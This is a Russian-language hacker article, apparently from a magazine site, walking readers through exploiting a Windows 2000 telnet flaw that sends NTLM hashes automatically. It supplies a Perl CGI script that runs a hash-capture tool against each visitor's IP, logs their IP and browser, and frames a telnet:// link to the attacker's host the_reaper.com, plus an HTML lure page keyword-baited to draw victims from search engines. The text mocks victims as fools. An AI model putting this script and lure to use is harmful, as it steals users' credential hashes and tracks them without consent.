Привет переЦ))

Новая дырка в WIN2000 может
дать тебе все, что ты хочешь))

Суть: telnet автоматически
проводит NTLM-авторизацию, если сервер ее
поддерживает, без подтверждения
пользователя. Это позволяет получить NTLM-хэш
используя, например, URL telnet:

Что болеет:
MICROSOFT: Windows 2000 Professional
MICROSOFT: Windows 2000 Server
MICROSOFT: Windows 2000 Advanced Server
ЙОУ вперед и с песней.!.!.!

Для начала нужно
спровоцировать клиента на telnet коннект, а
затем шарахнуть по нему от всей X_души. Все
нижеуказанное было испытано из под Linux RH6.1.
Забиваем в JOE следующий текст
(это сердце нашей машины смерти) сохранимся
aka telnet2000.cpp и скомпилимся))).

Далее нам нужно
спровоцировать ЮЗВЕРЯ…

Провокация проста до безобразия,
размещаем сию форму у себя на серваке
the_reaper.com в теле перлового скрипта from_me.cgi:

#coded by -=Sky12DooR=-#
#! usr/bin/perl
use CGI qw(:standard);
use Time::localtime;
print header;
$browser = "$ENV{HTTP_USER_AGENT}";
$language = "$ENV{HTTP_ACCEPT_LANGUAGE}";
$ip = "$ENV{REMOTE_ADDR}";
`./telnetwin2000 -t $ip -l <logfile_name>`;
print ("<html>");
print ("<frameset rows=’100%,*’>");
print ("<frame src=about:blank>");
print ("<frame src=telnet://the_reaper.com:23>");
print ("</frameset></html>");
$file="stupid_lamerzzz.txt";
$St=ctime();
 open(writeip,">>$file");
print writeip "$ip; $browser; $language ; $St\n";
close(writeip);
`killall telnetwin2000`;

Далее создадим страничку cool_xakep.htm
идексированную для запроса с поисковиков
типа : очень клевые девочки, все для хакера .ГЫ…
<html>
<head><title>UR FAVORITE PAGE NOW</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<meta name="Keywords" content="очень клевые
девочки все для хакера etc…">
<meta name="ROBOTS" content="INDEX,FOLLOW">
</head>
<FRAMESET ROWS="100%,*" BORDER="0" FRAMEBORDER="0"
FRAMESPACING="0">
<FRAME NAME="MYTOPFRAME" SRC="http://the_reaper.com/cgi-bin/from_me.cgi"
MARGINHEIGHT="1" MARGINWIDTH="1" SCROLLING="AUTO"
FRAMEBORDER="0" NORESIZE>
<NOFRAMES>
  <body >
  <p>UR OS&BROWSER SO OLD I CANT TO FUCK U!!!.</p>
  </body>
  </noframes>
</frameset>
</html>

ТЕПЕРЬ ОНИ ВСЕ ТВОИ! После захода на
http://the_reaper.com/cool_xakep.htm порадутся инфе, которая
находится в logfile_name. Список придурков
которых ты поимел в файле — stupid_lamerzzz.txt

THATS ALL FOLKS.

P.S. Перец, над кое-чем тебе придется
поразмыслить (это нужно в первую очередь тебе) , мне не пиши т.к. я далеко не
альтруист.

Оставить мнение

Check Also

Скрытая сила пробела. Эксплуатируем критическую уязвимость в Apache Tomcat

В этой статье мы поговорим о баге в Apache Tomcat, популярнейшем веб-сервере для сайтов на…